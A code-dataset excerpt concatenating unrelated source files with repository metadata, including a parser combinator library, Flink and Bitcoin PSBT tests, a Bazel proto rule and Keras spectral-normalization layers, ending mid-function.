"Unlicense"
] | 3
|
2018-04-26T09:38:18.000Z
|
2021-04-15T08:22:09.000Z
|
tests/rl/settings.py
|
UIA-CAIR/Multitask
|
b0d9ac348a56c97ca7826de358bd0428c7a90992
|
[
"Unlicense"
] | 5
|
2018-01-14T18:51:05.000Z
|
2018-02-04T06:29:38.000Z
|
settings = {
"learning_rate": 1e-6,
"memory_size": 1000000, # 1 Million frames in memory
"epsilon_start": 0.5, # Start of epsilon decent
"epsilon_end": 0.0, # End of epsilon decent
"epsilon_steps": 100000, # Epsilon steps
"exploration_wins": 0, # Number of victories using random moves before starting epsilon phase
"batch_size": 16,
"discount_factor": 0.99,
"grayscale": False,
"load_latest_checkpoint": False,
}
| 45.916667
| 114
| 0.558984
|
40d9c4f2b4c4c4b5e8893a2e5b17524ba9cba4d8
| 2,322
|
py
|
Python
|
parser_min.py
|
davidmaamoaix/parser-combinator-boilerplate
|
516f652b2bf27a3751f32d4d027649ac7406b59b
|
[
"MIT"
] | null | null | null |
parser_min.py
|
davidmaamoaix/parser-combinator-boilerplate
|
516f652b2bf27a3751f32d4d027649ac7406b59b
|
[
"MIT"
] | null | null | null |
parser_min.py
|
davidmaamoaix/parser-combinator-boilerplate
|
516f652b2bf27a3751f32d4d027649ac7406b59b
|
[
"MIT"
] | null | null | null |
accum=lambda s,p:s.a[0](*p) if len(p)>=s.a[2] else Curry(s.a[0],p,s.a[2])
class Curry:
__init__=lambda s,f,p,l=None:setattr(s,'a',
[f,p,f.__code__.co_argcount if l is None else l])
__call__=lambda s,*a:accum(s,[*s.a[1],*a])
curry=lambda x,l=None:x if isinstance(x,Curry) else Curry(x,[],l)
lift2A=curry(lambda f,fa,fb:f@fa*fb)
flip=curry(lambda f,a,b:f(b,a))
fmap=curry(lambda f,a:f@a)
add=curry(lambda a,b:a+b)
prepend=curry(lambda a,b:[a,*b])
compose=curry(lambda f,g:lambda x:f(g(x)))
eq=curry(lambda a,b:a==b)
const=curry(lambda a,_:a)
tup=curry(lambda a,b:(a,b))
join=curry(''.join,1)
debug=curry(print,1)
class Parser:
__init__=lambda s,f:setattr(s,'p',f)
__rmatmul__=lambda s,f:Parser(lambda x,s=s,f=f:[(r,curry(f)(v)) \
for (r,v) in s.p(x)])
_pure=classmethod(lambda cls,a:Parser(lambda s,a=a:[(s,a)]))
__mul__=lambda s,a:Parser(lambda x,s=s,a=a:sum(([(ra,vf(va)) \
for (ra,va) in a.p(rf)] for (rf,vf) in s.p(x)),[]))
__lshift__=lambda s,o:lift2A(const)(s,o)
__rshift__=lambda s,o:lift2A(flip(const))(s)(o)
_empty=classmethod(lambda c:Parser(lambda s:[]))
__or__=lambda s,o:Parser(lambda x,s=s,o=o:s.p(x)+o.p(x))
_ret=classmethod(lambda c,a:pure(a))
__xor__=lambda s,f:Parser(lambda x,s=s,f=f:sum((f(v).p(r) \
for (r,v) in s.p(x)),[]))
def many(p):
def inner(s):
return sum(((lambda result:[(ro,[vo])] if not result else \
[(ro,[vo])]+[(ri,[vo,*vi]) for (ri,vi) in result])\
(inner(ro)) for (ro,vo) in p.p(s)),[])
return Parser(inner)|pure([])
string=(lambda c:c(c))(lambda f:lambda s:pure('') \
if not s else add@char(s[0])*f(f)(s[1:]))
empty=Parser._empty()
pure=Parser._pure
wild=Parser(lambda s:[] if not s else [(s[1:],s[0])])
pred=lambda p,w=wild:w^(lambda c:pure(c) if p(c) else empty)
char=lambda c:pred(eq(c))
any_of=lambda x:pred(lambda c:c in x)
none_of=lambda x:pred(lambda c:c not in x)
between=curry(lambda start,end,p:start>>p<<end)
many1=lambda p:p^(lambda x:many(p)^(lambda xs:pure([x,*xs])))
sep1=curry(lambda p,s:p^(lambda x:many(s>>p)^(lambda xs:pure([x,*xs]))))
sep=curry(lambda p,s:sep1(p,s)|pure([]))
spaces=many(any_of('\n\t '))
wwrap=lambda p:spaces>>p<<spaces
digit=any_of('1234567890')
end=Parser(lambda s:[('','')] if not s else [])
| 43
| 73
| 0.615418
|
83c7e65db6d4f795ad0ecc58ed1b17b194b888f7
| 226
|
py
|
Python
|
tests/resources/mlflow-test-plugin/mlflow_test_plugin/local_artifact.py
|
iPieter/kiwi
|
76b66872fce68873809a0dea112e2ed552ae5b63
|
[
"Apache-2.0"
] | null | null | null |
tests/resources/mlflow-test-plugin/mlflow_test_plugin/local_artifact.py
|
iPieter/kiwi
|
76b66872fce68873809a0dea112e2ed552ae5b63
|
[
"Apache-2.0"
] | 1
|
2021-01-24T13:34:51.000Z
|
2021-01-24T13:34:51.000Z
|
tests/resources/mlflow-test-plugin/mlflow_test_plugin/local_artifact.py
|
iPieter/kiwi
|
76b66872fce68873809a0dea112e2ed552ae5b63
|
[
"Apache-2.0"
] | null | null | null |
from kiwi.store.artifact.local_artifact_repo import LocalArtifactRepository
class PluginLocalArtifactRepository(LocalArtifactRepository):
"""LocalArtifactRepository provided through plugin system"""
is_plugin = True
| 32.285714
| 75
| 0.836283
|
51da30289bf76c045ba4cd54c25955d947b7d915
| 3,694
|
py
|
Python
|
flink-python/pyflink/table/tests/test_set_operation.py
|
tamirsagi/flink
|
778483a0a387251bc8b78f23b41352a1fbf146a2
|
[
"Apache-2.0"
] | null | null | null |
flink-python/pyflink/table/tests/test_set_operation.py
|
tamirsagi/flink
|
778483a0a387251bc8b78f23b41352a1fbf146a2
|
[
"Apache-2.0"
] | null | null | null |
flink-python/pyflink/table/tests/test_set_operation.py
|
tamirsagi/flink
|
778483a0a387251bc8b78f23b41352a1fbf146a2
|
[
"Apache-2.0"
] | 2
|
2022-02-15T07:05:13.000Z
|
2022-03-18T07:08:20.000Z
|
################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# # distributed under the License is distributed on an "AS IS" BASIS,
# # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# # See the License for the specific language governing permissions and
# # limitations under the License.
################################################################################
from pyflink.testing.test_case_utils import PyFlinkOldBatchTableTestCase
class StreamTableSetOperationTests(PyFlinkOldBatchTableTestCase):
data1 = [(1, "Hi", "Hello")]
data2 = [(3, "Hello", "Hello")]
schema = ["a", "b", "c"]
def test_minus(self):
t_env = self.t_env
t1 = t_env.from_elements(self.data1, self.schema)
t2 = t_env.from_elements(self.data2, self.schema)
result = t1.minus(t2)
self.assertEqual('MINUS', result._j_table.getQueryOperation().getType().toString())
self.assertFalse(result._j_table.getQueryOperation().isAll())
def test_minus_all(self):
t_env = self.t_env
t1 = t_env.from_elements(self.data1, self.schema)
t2 = t_env.from_elements(self.data2, self.schema)
result = t1.minus_all(t2)
self.assertEqual('MINUS', result._j_table.getQueryOperation().getType().toString())
self.assertTrue(result._j_table.getQueryOperation().isAll())
def test_union(self):
t_env = self.t_env
t1 = t_env.from_elements(self.data1, self.schema)
t2 = t_env.from_elements(self.data2, self.schema)
result = t1.union(t2)
self.assertEqual('UNION', result._j_table.getQueryOperation().getType().toString())
self.assertFalse(result._j_table.getQueryOperation().isAll())
def test_union_all(self):
t_env = self.t_env
t1 = t_env.from_elements(self.data1, self.schema)
t2 = t_env.from_elements(self.data2, self.schema)
result = t1.union_all(t2)
self.assertEqual('UNION', result._j_table.getQueryOperation().getType().toString())
self.assertTrue(result._j_table.getQueryOperation().isAll())
def test_intersect(self):
t_env = self.t_env
t1 = t_env.from_elements(self.data1, self.schema)
t2 = t_env.from_elements(self.data2, self.schema)
result = t1.intersect(t2)
self.assertEqual('INTERSECT', result._j_table.getQueryOperation().getType().toString())
self.assertFalse(result._j_table.getQueryOperation().isAll())
def test_intersect_all(self):
t_env = self.t_env
t1 = t_env.from_elements(self.data1, self.schema)
t2 = t_env.from_elements(self.data2, self.schema)
result = t1.intersect_all(t2)
self.assertEqual('INTERSECT', result._j_table.getQueryOperation().getType().toString())
self.assertTrue(result._j_table.getQueryOperation().isAll())
if __name__ == '__main__':
import unittest
try:
import xmlrunner
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports')
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
| 39.72043
| 95
| 0.661072
|
389abffd1089c4834157e7e4a1b04cb6bdbef15e
| 756
|
bzl
|
Python
|
tools/build_rules/proto.bzl
|
google/qrisp
|
1970d13166cddcd05cb10fccdb34247c7b0dddf3
|
[
"Apache-2.0"
] | 11
|
2015-12-14T07:03:31.000Z
|
2020-03-15T07:13:27.000Z
|
tools/build_rules/proto.bzl
|
google/qrisp
|
1970d13166cddcd05cb10fccdb34247c7b0dddf3
|
[
"Apache-2.0"
] | 1
|
2016-04-01T20:40:12.000Z
|
2016-04-06T00:01:34.000Z
|
tools/build_rules/proto.bzl
|
google/qrisp
|
1970d13166cddcd05cb10fccdb34247c7b0dddf3
|
[
"Apache-2.0"
] | 10
|
2016-02-25T08:08:09.000Z
|
2021-10-21T12:40:33.000Z
|
proto_filetype = FileType([".proto"])
# code adapted from mzhaom.
def proto_library(name, src, deps = None):
proto_cc_deps = [
"//google/protobuf:protoc",
]
cc_deps = [
"//google/protobuf:protobuf"
]
command = "$(location //google/protobuf:protoc) --cpp_out=$(GENDIR)/"
command += " $(location %s)" % (src)
basename = src[0:-5]
cc_proto_name = name + "_cc_proto"
header_outputs = [
basename + "pb.h",
]
outputs = header_outputs + [
basename + "pb.cc",
]
native.genrule(
name = cc_proto_name,
srcs = [ src ] + proto_cc_deps,
cmd = command,
outs = outputs,
)
native.cc_library(
name = name,
hdrs = header_outputs,
srcs = [
":" + cc_proto_name
],
deps = cc_deps,
)
| 19.894737
| 71
| 0.589947
|
c434a7b0a3be733b519f2a9830a7747433766ceb
| 165
|
py
|
Python
|
News/admin.py
|
pajuhesh80/NewsBlog
|
0712dc76703d89d8d0881d568d2aa902372a7b8f
|
[
"MIT"
] | 6
|
2022-01-29T15:45:15.000Z
|
2022-03-28T21:04:22.000Z
|
News/admin.py
|
pajuhesh80/NewsBlog
|
0712dc76703d89d8d0881d568d2aa902372a7b8f
|
[
"MIT"
] | null | null | null |
News/admin.py
|
pajuhesh80/NewsBlog
|
0712dc76703d89d8d0881d568d2aa902372a7b8f
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import *
admin.site.register(Category)
admin.site.register(Post)
admin.site.register(Comment)
admin.site.register(Ad)
| 20.625
| 32
| 0.806061
|
7ea318d468da0cce576df316d7876846087dc3f9
| 255
|
py
|
Python
|
sample_register/sample_register/doctype/test/test_test.py
|
TRUFIL/sampreg
|
d14155954b3a22b0a727d61e55f3619ade448379
|
[
"MIT"
] | null | null | null |
sample_register/sample_register/doctype/test/test_test.py
|
TRUFIL/sampreg
|
d14155954b3a22b0a727d61e55f3619ade448379
|
[
"MIT"
] | null | null | null |
sample_register/sample_register/doctype/test/test_test.py
|
TRUFIL/sampreg
|
d14155954b3a22b0a727d61e55f3619ade448379
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2015, indictrans and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
# test_records = frappe.get_test_records('Test')
class TestTest(unittest.TestCase):
pass
| 19.615385
| 49
| 0.764706
|
5cd5613412b58cdd02d038b4d537fa6d5c5a56a3
| 15,383
|
py
|
Python
|
test/functional/rpc_psbt.py
|
opensourcerulez/xaya
|
0bd3b6658c29f04bc8a40dbc9cc35fbdb26ff3cf
|
[
"MIT"
] | null | null | null |
test/functional/rpc_psbt.py
|
opensourcerulez/xaya
|
0bd3b6658c29f04bc8a40dbc9cc35fbdb26ff3cf
|
[
"MIT"
] | null | null | null |
test/functional/rpc_psbt.py
|
opensourcerulez/xaya
|
0bd3b6658c29f04bc8a40dbc9cc35fbdb26ff3cf
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the Partially Signed Transaction RPCs.
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error, find_output, disconnect_nodes, connect_nodes_bi, sync_blocks
import json
import os
MAX_BIP125_RBF_SEQUENCE = 0xfffffffd
# Create one-input, one-output, no-fee transaction:
class PSBTTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = False
self.num_nodes = 3
# Upstream Bitcoin has p2sh-segwit as default address type and this
# test depends on that. Since we changed it (for now, pending
# segwit activation in Namecoin), explicitly specify the address
# type for this test.
self.extra_args = [["-addresstype=p2sh-segwit"]] * self.num_nodes
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def test_utxo_conversion(self):
mining_node = self.nodes[2]
offline_node = self.nodes[0]
online_node = self.nodes[1]
# Disconnect offline node from others
disconnect_nodes(offline_node, 1)
disconnect_nodes(online_node, 0)
disconnect_nodes(offline_node, 2)
disconnect_nodes(mining_node, 0)
# Mine a transaction that credits the offline address
offline_addr = offline_node.getnewaddress(address_type="p2sh-segwit")
online_addr = online_node.getnewaddress(address_type="p2sh-segwit")
online_node.importaddress(offline_addr, "", False)
mining_node.sendtoaddress(address=offline_addr, amount=1.0)
mining_node.generate(nblocks=1)
sync_blocks([mining_node, online_node])
# Construct an unsigned PSBT on the online node (who doesn't know the output is Segwit, so will include a non-witness UTXO)
utxos = online_node.listunspent(addresses=[offline_addr])
raw = online_node.createrawtransaction([{"txid":utxos[0]["txid"], "vout":utxos[0]["vout"]}],[{online_addr:0.9999}])
psbt = online_node.walletprocesspsbt(online_node.converttopsbt(raw))["psbt"]
assert("non_witness_utxo" in mining_node.decodepsbt(psbt)["inputs"][0])
# Have the offline node sign the PSBT (which will update the UTXO to segwit)
signed_psbt = offline_node.walletprocesspsbt(psbt)["psbt"]
assert("witness_utxo" in mining_node.decodepsbt(signed_psbt)["inputs"][0])
# Make sure we can mine the resulting transaction
txid = mining_node.sendrawtransaction(mining_node.finalizepsbt(signed_psbt)["hex"])
mining_node.generate(1)
sync_blocks([mining_node, online_node])
assert_equal(online_node.gettxout(txid,0)["confirmations"], 1)
# Reconnect
connect_nodes_bi(self.nodes, 0, 1)
connect_nodes_bi(self.nodes, 0, 2)
def run_test(self):
# Activate segwit at height 432.
self.nodes[0].generate (500)
self.sync_all()
# Create and fund a raw tx for sending 10 BTC
psbtx1 = self.nodes[0].walletcreatefundedpsbt([], {self.nodes[2].getnewaddress():10})['psbt']
# Node 1 should not be able to add anything to it but still return the psbtx same as before
psbtx = self.nodes[1].walletprocesspsbt(psbtx1)['psbt']
assert_equal(psbtx1, psbtx)
# Sign the transaction and send
signed_tx = self.nodes[0].walletprocesspsbt(psbtx)['psbt']
final_tx = self.nodes[0].finalizepsbt(signed_tx)['hex']
self.nodes[0].sendrawtransaction(final_tx)
# Create p2sh, p2wpkh, and p2wsh addresses
pubkey0 = self.nodes[0].getaddressinfo(self.nodes[0].getnewaddress())['pubkey']
pubkey1 = self.nodes[1].getaddressinfo(self.nodes[1].getnewaddress())['pubkey']
pubkey2 = self.nodes[2].getaddressinfo(self.nodes[2].getnewaddress())['pubkey']
p2sh = self.nodes[1].addmultisigaddress(2, [pubkey0, pubkey1, pubkey2], "", "legacy")['address']
p2wsh = self.nodes[1].addmultisigaddress(2, [pubkey0, pubkey1, pubkey2], "", "bech32")['address']
p2sh_p2wsh = self.nodes[1].addmultisigaddress(2, [pubkey0, pubkey1, pubkey2], "", "p2sh-segwit")['address']
p2wpkh = self.nodes[1].getnewaddress("", "bech32")
p2pkh = self.nodes[1].getnewaddress("", "legacy")
p2sh_p2wpkh = self.nodes[1].getnewaddress("", "p2sh-segwit")
# fund those addresses
rawtx = self.nodes[0].createrawtransaction([], {p2sh:10, p2wsh:10, p2wpkh:10, p2sh_p2wsh:10, p2sh_p2wpkh:10, p2pkh:10})
rawtx = self.nodes[0].fundrawtransaction(rawtx, {"changePosition":3})
signed_tx = self.nodes[0].signrawtransactionwithwallet(rawtx['hex'])['hex']
txid = self.nodes[0].sendrawtransaction(signed_tx)
self.nodes[0].generate(6)
self.sync_all()
# Find the output pos
p2sh_pos = -1
p2wsh_pos = -1
p2wpkh_pos = -1
p2pkh_pos = -1
p2sh_p2wsh_pos = -1
p2sh_p2wpkh_pos = -1
decoded = self.nodes[0].decoderawtransaction(signed_tx)
for out in decoded['vout']:
if out['scriptPubKey']['addresses'][0] == p2sh:
p2sh_pos = out['n']
elif out['scriptPubKey']['addresses'][0] == p2wsh:
p2wsh_pos = out['n']
elif out['scriptPubKey']['addresses'][0] == p2wpkh:
p2wpkh_pos = out['n']
elif out['scriptPubKey']['addresses'][0] == p2sh_p2wsh:
p2sh_p2wsh_pos = out['n']
elif out['scriptPubKey']['addresses'][0] == p2sh_p2wpkh:
p2sh_p2wpkh_pos = out['n']
elif out['scriptPubKey']['addresses'][0] == p2pkh:
p2pkh_pos = out['n']
# spend single key from node 1
rawtx = self.nodes[1].walletcreatefundedpsbt([{"txid":txid,"vout":p2wpkh_pos},{"txid":txid,"vout":p2sh_p2wpkh_pos},{"txid":txid,"vout":p2pkh_pos}], {self.nodes[1].getnewaddress():29.99})['psbt']
walletprocesspsbt_out = self.nodes[1].walletprocesspsbt(rawtx)
assert_equal(walletprocesspsbt_out['complete'], True)
self.nodes[1].sendrawtransaction(self.nodes[1].finalizepsbt(walletprocesspsbt_out['psbt'])['hex'])
# partially sign multisig things with node 1
psbtx = self.nodes[1].walletcreatefundedpsbt([{"txid":txid,"vout":p2wsh_pos},{"txid":txid,"vout":p2sh_pos},{"txid":txid,"vout":p2sh_p2wsh_pos}], {self.nodes[1].getnewaddress():29.99})['psbt']
walletprocesspsbt_out = self.nodes[1].walletprocesspsbt(psbtx)
psbtx = walletprocesspsbt_out['psbt']
assert_equal(walletprocesspsbt_out['complete'], False)
# partially sign with node 2. This should be complete and sendable
walletprocesspsbt_out = self.nodes[2].walletprocesspsbt(psbtx)
assert_equal(walletprocesspsbt_out['complete'], True)
self.nodes[2].sendrawtransaction(self.nodes[2].finalizepsbt(walletprocesspsbt_out['psbt'])['hex'])
# check that walletprocesspsbt fails to decode a non-psbt
rawtx = self.nodes[1].createrawtransaction([{"txid":txid,"vout":p2wpkh_pos}], {self.nodes[1].getnewaddress():9.99})
assert_raises_rpc_error(-22, "TX decode failed", self.nodes[1].walletprocesspsbt, rawtx)
# Convert a non-psbt to psbt and make sure we can decode it
rawtx = self.nodes[0].createrawtransaction([], {self.nodes[1].getnewaddress():10})
rawtx = self.nodes[0].fundrawtransaction(rawtx)
new_psbt = self.nodes[0].converttopsbt(rawtx['hex'])
self.nodes[0].decodepsbt(new_psbt)
# Make sure that a psbt with signatures cannot be converted
signedtx = self.nodes[0].signrawtransactionwithwallet(rawtx['hex'])
assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].converttopsbt, signedtx['hex'])
assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].converttopsbt, signedtx['hex'], False)
# Unless we allow it to convert and strip signatures
self.nodes[0].converttopsbt(signedtx['hex'], True)
# Explicitly allow converting non-empty txs
new_psbt = self.nodes[0].converttopsbt(rawtx['hex'])
self.nodes[0].decodepsbt(new_psbt)
# Create outputs to nodes 1 and 2
node1_addr = self.nodes[1].getnewaddress()
node2_addr = self.nodes[2].getnewaddress()
txid1 = self.nodes[0].sendtoaddress(node1_addr, 13)
txid2 =self.nodes[0].sendtoaddress(node2_addr, 13)
self.nodes[0].generate(6)
self.sync_all()
vout1 = find_output(self.nodes[1], txid1, 13)
vout2 = find_output(self.nodes[2], txid2, 13)
# Create a psbt spending outputs from nodes 1 and 2
psbt_orig = self.nodes[0].createpsbt([{"txid":txid1, "vout":vout1}, {"txid":txid2, "vout":vout2}], {self.nodes[0].getnewaddress():25.999})
# Update psbts, should only have data for one input and not the other
psbt1 = self.nodes[1].walletprocesspsbt(psbt_orig)['psbt']
psbt1_decoded = self.nodes[0].decodepsbt(psbt1)
assert psbt1_decoded['inputs'][0] and not psbt1_decoded['inputs'][1]
psbt2 = self.nodes[2].walletprocesspsbt(psbt_orig)['psbt']
psbt2_decoded = self.nodes[0].decodepsbt(psbt2)
assert not psbt2_decoded['inputs'][0] and psbt2_decoded['inputs'][1]
# Combine, finalize, and send the psbts
combined = self.nodes[0].combinepsbt([psbt1, psbt2])
finalized = self.nodes[0].finalizepsbt(combined)['hex']
self.nodes[0].sendrawtransaction(finalized)
self.nodes[0].generate(6)
self.sync_all()
# Test additional args in walletcreatepsbt
# Make sure both pre-included and funded inputs
# have the correct sequence numbers based on
# replaceable arg
block_height = self.nodes[0].getblockcount()
unspent = self.nodes[0].listunspent()[0]
psbtx_info = self.nodes[0].walletcreatefundedpsbt([{"txid":unspent["txid"], "vout":unspent["vout"]}], [{self.nodes[2].getnewaddress():unspent["amount"]+1}], block_height+2, {"replaceable":True}, False)
decoded_psbt = self.nodes[0].decodepsbt(psbtx_info["psbt"])
for tx_in, psbt_in in zip(decoded_psbt["tx"]["vin"], decoded_psbt["inputs"]):
assert_equal(tx_in["sequence"], MAX_BIP125_RBF_SEQUENCE)
assert "bip32_derivs" not in psbt_in
assert_equal(decoded_psbt["tx"]["locktime"], block_height+2)
# Same construction with only locktime set
psbtx_info = self.nodes[0].walletcreatefundedpsbt([{"txid":unspent["txid"], "vout":unspent["vout"]}], [{self.nodes[2].getnewaddress():unspent["amount"]+1}], block_height, {}, True)
decoded_psbt = self.nodes[0].decodepsbt(psbtx_info["psbt"])
for tx_in, psbt_in in zip(decoded_psbt["tx"]["vin"], decoded_psbt["inputs"]):
assert tx_in["sequence"] > MAX_BIP125_RBF_SEQUENCE
assert "bip32_derivs" in psbt_in
assert_equal(decoded_psbt["tx"]["locktime"], block_height)
# Same construction without optional arguments
psbtx_info = self.nodes[0].walletcreatefundedpsbt([{"txid":unspent["txid"], "vout":unspent["vout"]}], [{self.nodes[2].getnewaddress():unspent["amount"]+1}])
decoded_psbt = self.nodes[0].decodepsbt(psbtx_info["psbt"])
for tx_in in decoded_psbt["tx"]["vin"]:
assert tx_in["sequence"] > MAX_BIP125_RBF_SEQUENCE
assert_equal(decoded_psbt["tx"]["locktime"], 0)
# Make sure change address wallet does not have P2SH innerscript access to results in success
# when attempting BnB coin selection
self.nodes[0].walletcreatefundedpsbt([], [{self.nodes[2].getnewaddress():unspent["amount"]+1}], block_height+2, {"changeAddress":self.nodes[1].getnewaddress()}, False)
# Regression test for 14473 (mishandling of already-signed witness transaction):
psbtx_info = self.nodes[0].walletcreatefundedpsbt([{"txid":unspent["txid"], "vout":unspent["vout"]}], [{self.nodes[2].getnewaddress():unspent["amount"]+1}])
complete_psbt = self.nodes[0].walletprocesspsbt(psbtx_info["psbt"])
double_processed_psbt = self.nodes[0].walletprocesspsbt(complete_psbt["psbt"])
assert_equal(complete_psbt, double_processed_psbt)
# We don't care about the decode result, but decoding must succeed.
self.nodes[0].decodepsbt(double_processed_psbt["psbt"])
# BIP 174 Test Vectors
# Check that unknown values are just passed through
unknown_psbt = "cHNidP8BAD8CAAAAAf//////////////////////////////////////////AAAAAAD/////AQAAAAAAAAAAA2oBAAAAAAAACg8BAgMEBQYHCAkPAQIDBAUGBwgJCgsMDQ4PAAA="
unknown_out = self.nodes[0].walletprocesspsbt(unknown_psbt)['psbt']
assert_equal(unknown_psbt, unknown_out)
# Open the data file
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/rpc_psbt.json'), encoding='utf-8') as f:
d = json.load(f)
invalids = d['invalid']
valids = d['valid']
creators = d['creator']
signers = d['signer']
combiners = d['combiner']
finalizers = d['finalizer']
extractors = d['extractor']
# Invalid PSBTs
for invalid in invalids:
assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].decodepsbt, invalid)
# Valid PSBTs
for valid in valids:
self.nodes[0].decodepsbt(valid)
# Creator Tests
for creator in creators:
created_tx = self.nodes[0].createpsbt(creator['inputs'], creator['outputs'])
assert_equal(created_tx, creator['result'])
# Signer tests
for i, signer in enumerate(signers):
self.nodes[2].createwallet("wallet{}".format(i))
wrpc = self.nodes[2].get_wallet_rpc("wallet{}".format(i))
for key in signer['privkeys']:
wrpc.importprivkey(key)
signed_tx = wrpc.walletprocesspsbt(signer['psbt'])['psbt']
assert_equal(signed_tx, signer['result'])
# Combiner test
for combiner in combiners:
combined = self.nodes[2].combinepsbt(combiner['combine'])
assert_equal(combined, combiner['result'])
# Finalizer test
for finalizer in finalizers:
finalized = self.nodes[2].finalizepsbt(finalizer['finalize'], False)['psbt']
assert_equal(finalized, finalizer['result'])
# Extractor test
for extractor in extractors:
extracted = self.nodes[2].finalizepsbt(extractor['extract'], True)['hex']
assert_equal(extracted, extractor['result'])
# Unload extra wallets
for i, signer in enumerate(signers):
self.nodes[2].unloadwallet("wallet{}".format(i))
self.test_utxo_conversion()
# Test that psbts with p2pkh outputs are created properly
p2pkh = self.nodes[0].getnewaddress(address_type='legacy')
psbt = self.nodes[1].walletcreatefundedpsbt([], [{p2pkh : 1}], 0, {"includeWatching" : True}, True)
self.nodes[0].decodepsbt(psbt['psbt'])
if __name__ == '__main__':
PSBTTest().main()
| 50.768977
| 209
| 0.655789
|
9e6df957fca4ca661644d0467f850d3861af902d
| 21,575
|
py
|
Python
|
soph/nn/nn.py
|
artificialsoph/soph.py
|
58ae497f71bb48ecba7bcb8771f64112fdc9f3fb
|
[
"MIT"
] | null | null | null |
soph/nn/nn.py
|
artificialsoph/soph.py
|
58ae497f71bb48ecba7bcb8771f64112fdc9f3fb
|
[
"MIT"
] | null | null | null |
soph/nn/nn.py
|
artificialsoph/soph.py
|
58ae497f71bb48ecba7bcb8771f64112fdc9f3fb
|
[
"MIT"
] | null | null | null |
import keras
import numpy as np
from keras import backend as K
# epsilon set according to BIGGAN https://arxiv.org/pdf/1809.11096.pdf
def _l2normalizer(v, epsilon=1e-4):
return v / (K.sum(v**2)**0.5 + epsilon)
def power_iteration(W, u, rounds=1):
'''
Accroding the paper, we only need to do power iteration one time.
'''
_u = u
for i in range(rounds):
_v = _l2normalizer(K.dot(_u, W))
_u = _l2normalizer(K.dot(_v, K.transpose(W)))
W_sn = K.sum(K.dot(_u, W) * _v)
return W_sn, _u, _v
class Conv2D(keras.layers.Conv2D):
def __init__(self, filters, spectral_normalization=False, **kwargs):
self.spectral_normalization = spectral_normalization
super(Conv2D, self).__init__(filters, **kwargs)
def build(self, input_shape):
# Create a trainable weight variable for this layer.
self.u = self.add_weight(name='u', shape=(1, self.filters),
initializer='uniform', trainable=False)
# self.kernel = self.add_weight(name='kernel',
# shape=(input_shape[1], self.output_dim),
# initializer='uniform',
# trainable=True)
super(Conv2D, self).build(input_shape)
# Be sure to call this at the end
def compute_spectral_normal(self, training=True):
# Spectrally Normalized Weight
if self.spectral_normalization:
# Get kernel tensor shape [kernel_h, kernel_w, in_channels, out_channels]
W_shape = self.kernel.shape.as_list()
# Flatten the Tensor
# [out_channels, N]
W_mat = K.reshape(self.kernel, [W_shape[-1], -1])
W_sn, u, v = power_iteration(W_mat, self.u)
if training:
# Update estimated 1st singular vector
self.u.assign(u)
return self.kernel / W_sn
else:
return self.kernel
def call(self, inputs, training=None):
outputs = K.conv2d(inputs,
self.compute_spectral_normal(training=training),
strides=self.strides, padding=self.padding,
data_format=self.data_format,
dilation_rate=self.dilation_rate)
if self.use_bias:
outputs = K.bias_add(outputs, self.bias,
data_format=self.data_format)
if self.activation is not None:
return self.activation(outputs)
return outputs
def compute_output_shape(self, input_shape):
return super(Conv2D, self).compute_output_shape(input_shape)
class Conv2DTranspose(keras.layers.Conv2DTranspose):
def __init__(self, spectral_normalization=False, **kwargs):
self.spectral_normalization = spectral_normalization
super(Conv2DTranspose, self).__init__(**kwargs)
def build(self, input_shape):
# Create a trainable weight variable for this layer.
self.u = self.add_weight(name='u', shape=(1, self.filters),
initializer='uniform', trainable=False)
# self.kernel = self.add_weight(name='kernel',
# shape=(input_shape[1], self.output_dim),
# initializer='uniform',
# trainable=True)
super(Conv2DTranspose, self).build(input_shape)
# Be sure to call this at the end
def compute_spectral_normal(self, training=True):
# Spectrally Normalized Weight
if self.spectral_normalization:
# Get kernel tensor shape [kernel_h, kernel_w, in_channels, out_channels]
W_shape = self.kernel.shape.as_list()
# Flatten the Tensor
# [out_channels, N]
W_mat = K.reshape(self.kernel, [W_shape[-2], -1])
W_sn, u, v = power_iteration(W_mat, self.u)
if training:
# Update estimated 1st singular vector
self.u.assign(u)
return self.kernel / W_sn
else:
return self.kernel
def call(self, inputs, training=None):
input_shape = K.shape(inputs)
batch_size = input_shape[0]
if self.data_format == 'channels_first':
h_axis, w_axis = 2, 3
else:
h_axis, w_axis = 1, 2
height, width = input_shape[h_axis], input_shape[w_axis]
kernel_h, kernel_w = self.kernel_size
stride_h, stride_w = self.strides
# Infer the dynamic output shape:
out_height = keras.utils.conv_utils.deconv_length(
height, stride_h, kernel_h, self.padding)
out_width = keras.utils.conv_utils.deconv_length(
width, stride_w, kernel_w, self.padding)
if self.data_format == 'channels_first':
output_shape = (batch_size, self.filters, out_height, out_width)
else:
output_shape = (batch_size, out_height, out_width, self.filters)
outputs = K.conv2d_transpose(
inputs,
self.compute_spectral_normal(training=training),
output_shape,
self.strides,
padding=self.padding,
data_format=self.data_format,
# dilation_rate=self.dilation_rate
)
if self.use_bias:
outputs = K.bias_add(outputs, self.bias,
data_format=self.data_format)
if self.activation is not None:
return self.activation(outputs)
return outputs
def compute_output_shape(self, input_shape):
return super(Conv2DTranspose, self).compute_output_shape(input_shape)
def act_layer(activation, name=None):
if name is None:
name = activation
